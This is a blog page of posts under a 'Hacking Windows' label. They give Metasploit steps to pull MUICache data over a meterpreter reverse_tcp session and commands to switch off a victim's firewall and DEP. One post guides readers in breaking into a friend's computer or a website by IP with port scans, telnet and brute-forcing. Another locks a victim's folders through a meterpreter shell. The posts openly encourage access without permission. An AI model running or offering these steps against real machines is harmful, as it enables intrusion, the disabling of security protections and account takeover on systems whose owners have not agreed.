Showing posts with label Hacking Windows. Show all posts

Friday, 11 July 2014

How to get MUICache Entries in Remote Windows Machine

According to Nirsoft.net, “each time that you start using a new application, Windows operating system automatically extract the application name from the version resource of the exe file, and stores it for using it later, in Registry key known as the ‘MuiCache’.”

use post/windows/gather/enum_muicache

msf exploit (enum_muicache)>set payload windows/meterpreter/reverse_tcp

msf exploit (enum_muicache)>set lhost 192.168.1.3 (IP of Local Host)

msf exploit (enum_muicache)>set session 2

msf exploit (enum_muicache)>exploit

How to Disable Windows Firewall using Metasploit

Windows Firewall can help protect your PC from hackers and malicious software. In Windows 7, it is still powerful—but we have made it more flexible and easier to use.

For example, now you can fine-tune the protection and notifications you want for each of your network profiles—Home, Work, and Public. When you are connected to a public network like a library or a coffee shop, you may want to block all incoming connections. At home or work, this might be overkill. Whatever level of protection you choose for your profiles, you will be able to switch between them with ease.

Command :

netsh firewall set opmode disable

Wednesday, 9 July 2014

How to stop Date Execution Prevention Service(DEP) using Metasploit in Windows

Data Execution Prevention (DEP) is a security feature that can help prevent damage to your computer from viruses and other security threats. Harmful programs can try to attack Windows by attempting to run (also known as execute) code from system memory locations reserved for Windows and other authorized programs. These types of attacks can harm your programs and files.

DEP can help protect your computer by monitoring your programs to make sure that they use system memory safely. If DEP notices a program on your computer using memory incorrectly, it closes the program and notifies you.

Command : bcdedit.exe /set {current} nx AlwaysOff

Wednesday, 19 June 2013

Hack remote computer via IP and open ports

Hack remote computer :

hacking is accessing something or somebody in internet without their permission or interest. While, speaking in summary, hacking is very easy job, it is like instead of using front door, finding the hidden door of a house and hijacking the precious things. Among all the hacking, hacking via IP address is one of the most common yet powerful beginning.

You may want to hack the website and put your advertisement there or grab some database information In this type of hacking, you are playing with the web server’s computer instead of the administrator’s computer. Because, www.website.com is hosted in separate web server rather than personal computer.

Another can be accessing your friend’s computer from your home. Again this is IP based and this is possible only when your friend’s computer is online. If it is off or not connected to internet then remote IP hacking is totally impossible.

Well, both of the hacking has the same process. Let’s summarize what we must do.

1. Confirm the website or a computer you want to hack.
2. Find or trace their IP address.
3. Make sure that IP address is online
4. Scan for open ports
5. Check for venerable ports

6. Access through the port
7. Brute-force username and password

Now let me describe in brief in merely basic steps that a child can understand it.
First, getting the IP address of victim.
To get the IP address of the victim website, ping for it in command prompt.

For example,
ping www.google.com

will fetch the IP address of Google.com

This is how we can get the IP address of the victims website.

How about your friend’s PC? You can’t do www.yourfirend’sname.com, can you? Finding your friend’s IP address is little tough job, and tougher it is if he has dynamic IP address that keeps changing.

One of the widely used method to detect IP address of your friend is by chatting with him.

You might find this article helpful

How to get the IP address using MSN/Yahoo/Pidgin messenger

Now you got the IP address right? Is it online?

To know the online status just ping the IP address, if it is online it will reply.

If the IP address is online, scan for the open ports. Open ports are like closed door without locks, you can go inside and outside easily.

Use Advanced Port Scanner to scan all open and venerable ports.

Now you’ve IP address and open port address of the victim, you can now use telnet to try to access them. Make sure that you’ve telnet enabled in your computer or install it from Control panel > Add remove programs > add windows components.

Now open command prompt and use telnet command to access to the IP address. Use following syntax for connection.

telnet [IP address] [Port]

You’ll be asked to input login information.

If you can guess the informations easily then it’s OK. Or you can use some brute-forcing tools like this one: Brutus, THC Hydra...

- THC Hydra
In this way you’ll able to hack remove computer using only IP address

Tuesday, 19 March 2013

How to lock and unlock folder in remote victim pc using metasploit

lock and unlock folder :

Once you got the meterpreter session use ‘shell‘command to get command prompt of the target.
Type Cacls (Folder Name) /e /p everyone:n and press Enter.